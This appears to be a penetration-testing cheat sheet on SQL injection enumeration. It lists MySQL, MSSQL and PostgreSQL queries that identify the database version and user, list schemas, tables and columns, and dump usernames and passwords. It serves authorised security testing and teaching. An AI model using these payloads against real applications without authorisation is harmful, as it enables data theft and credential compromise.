Database Enumeration

Enumeration Database information and dump tables

Database Enumeration and dumping is a crucial component of SQL Injection testing after the vulnerability has been confirmed. We can extract various sensitive data, user credentials, and much more.

Database Identification

The first step is to identify the type and version of Database Management Systems (DBMS) we are interacting with:

MySQL:

SELECT @@version;

MSSQL:

SELECT @@version;

PostgreSQL:

SELECT version()

Database User

It may also be beneficial to enumerate the user that the web application is authenticating to the database as.

MySQL:

SELECT USER();
SELECT CURRENT_USER();
SELECT CURRENT_USER;
SELECT SESSION_USER();

MSSQL:

SELECT CURRENT_USER;
SELECT user_name();
SELECT system_user;
SELECT user;

PostgreSQL:

SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();

Database Schema

Database schema refers to the structure of the database, including the databases, tables, and columns. We can use SQL injection to dump those information to find interesting information for the purposes of our engagement.

MSSQL:

InformationPayload
Database namesSELECT name FROM master..sysdatabases; OR SELECT name FROM master.sys.databases;
Table namesSELECT name FROM DB_NAME..sysobjects WHERE xtype = 'U';
Column namesSELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';

MySQL:

InformationPayload
Database namesSELECT schema_name FROM information_schema .schemata
Table namesSELECT table_name FROM information_schema.tables WHERE table_schema=DB_NAME
Column namesSELECT column_name FROM information_schema.columns WHERE table_schema=DB_NAME AND table_name=TB_NAME

PostgreSQL:

InformationPayload
Database namesSELECT datname FROM pg_database
Table namesSELECT table_name FROM information_schema.tables WHERE table_schema='<SCHEMA_NAME>'
Column namesSELECT column_name FROM information_schema.columns WHERE table_name='data_table'

Dumping data

After finding what databases, tables and columns are stored on the database, we can dump them using SELECT statements.

Example:

SELECT username, password FROM users;

References